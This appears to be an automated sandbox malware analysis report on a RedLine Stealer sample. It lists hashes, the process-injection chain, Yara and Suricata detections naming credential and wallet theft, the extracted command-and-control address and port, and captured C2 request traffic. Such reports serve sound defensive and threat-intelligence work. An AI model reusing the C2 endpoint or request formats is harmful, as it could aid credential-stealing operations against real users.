Edit tour

Windows Analysis Report
Z6ojPnRBp1.exe

Overview

General Information

Sample name:	Z6ojPnRBp1.exe renamed because original name is a hash value
Original sample name:	b92fbfb1456ffbbda1a668cba58533a7.exe
Analysis ID:	1632261
MD5:	b92fbfb1456ffbbda1a668cba58533a7
SHA1:	75bb0aebf4e0f239c3abb7604c1485a74b33e0c3
SHA256:	9ac72c52d01edd78f0012ecdd15ca8c839830c68b77681325dd11cda309eda85
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Z6ojPnRBp1.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\Z6ojPnRBp1.exe" MD5: B92FBFB1456FFBBDA1A668CBA58533A7)

RegSvcs.exe (PID: 7796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.249:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1406a:$a4: get_ScannedWallets 0x2be8a:$a4: get_ScannedWallets 0x43aaa:$a4: get_ScannedWallets 0x12ec8:$a5: get_ScanTelegram 0x2ace8:$a5: get_ScanTelegram 0x42908:$a5: get_ScanTelegram 0x13cee:$a6: get_ScanGeckoBrowsersPaths 0x2bb0e:$a6: get_ScanGeckoBrowsersPaths 0x4372e:$a6: get_ScanGeckoBrowsersPaths 0x11b0a:$a7: <Processes>k__BackingField 0x2992a:$a7: <Processes>k__BackingField 0x4154a:$a7: <Processes>k__BackingField 0xfa1c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2783c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3f45c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1143e:$a9: <ScanFTP>k__BackingField 0x2925e:$a9: <ScanFTP>k__BackingField 0x40e7e:$a9: <ScanFTP>k__BackingField
Process Memory Space: Z6ojPnRBp1.exe PID: 7556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Z6ojPnRBp1.exe PID: 7556	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Z6ojPnRBp1.exe PID: 7556	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: Z6ojPnRBp1.exe PID: 7556	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x6f44c:$a4: get_ScannedWallets 0x6e2f3:$a5: get_ScanTelegram 0x6f0d5:$a6: get_ScanGeckoBrowsersPaths 0x6cf86:$a7: <Processes>k__BackingField 0x6a4b9:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x6c8ba:$a9: <ScanFTP>k__BackingField
Process Memory Space: RegSvcs.exe PID: 7796	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7796	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7796	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x303777:$a4: get_ScannedWallets 0x30261e:$a5: get_ScanTelegram 0x303400:$a6: get_ScanGeckoBrowsersPaths 0x3012b1:$a7: <Processes>k__BackingField 0x2fe7e4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x300be5:$a9: <ScanFTP>k__BackingField
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
2.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
2.2.RegSvcs.exe.400000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
2.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x295eb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2961f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29648:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2b887:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2ae03:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b14b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2aa81:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x2826f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x20358:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x20d38:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet
0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x4300a:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x41e68:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x42c8e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0x40aaa:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3e9bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField 0x403de:$a9: <ScanFTP>k__BackingField
0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x297eb:$gen01: ChromeGetRoamingName 0x4140b:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2981f:$gen02: ChromeGetLocalName 0x4143f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29848:$gen03: get_UserDomainName 0x41468:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2ba87:$gen04: get_encrypted_key 0x436a7:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2b003:$gen05: browserPaths 0x42c23:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b34b:$gen06: GetBrowsers 0x42f6b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2ac81:$gen07: get_InstalledInputLanguages 0x428a1:$gen07: get_InstalledInputLanguages
0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
Click to see the 20 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:49.748761+0100	2045000	1	Malware Command and Control Activity Detected	45.137.22.249	55615	192.168.2.4	49717	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:56.179570+0100	2046056	1	A Network Trojan was detected	45.137.22.249	55615	192.168.2.4	49717	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:56.179570+0100	2045001	1	Malware Command and Control Activity Detected	45.137.22.249	55615	192.168.2.4	49717	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:44.329204+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49717	45.137.22.249	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:50.121401+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49717	45.137.22.249	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:58.184391+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49722	45.137.22.249	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:56.584422+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49721	45.137.22.249	55615	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:38:44.329204+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49717	45.137.22.249	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Z6ojPnRBp1.exe

Avira: detected

Found malware configuration

Source: 2.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.137.22.249:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: Z6ojPnRBp1.exe	Virustotal: Detection: 66%			Perma Link
Source: Z6ojPnRBp1.exe	ReversingLabs: Detection: 68%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Z6ojPnRBp1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.4:49720 version: TLS 1.0

Source: Z6ojPnRBp1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: zkuS.pdbSHA256 source: Z6ojPnRBp1.exe
Source:	Binary string: zkuS.pdb source: Z6ojPnRBp1.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49717 -> 45.137.22.249:55615
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49717 -> 45.137.22.249:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49721 -> 45.137.22.249:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49722 -> 45.137.22.249:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.249:55615 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49717 -> 45.137.22.249:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.249:55615 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.137.22.249:55615 -> 192.168.2.4:49717

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.137.22.249:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722

Source: global traffic

TCP traffic: 192.168.2.4:49717 -> 45.137.22.249:55615

Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.249:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
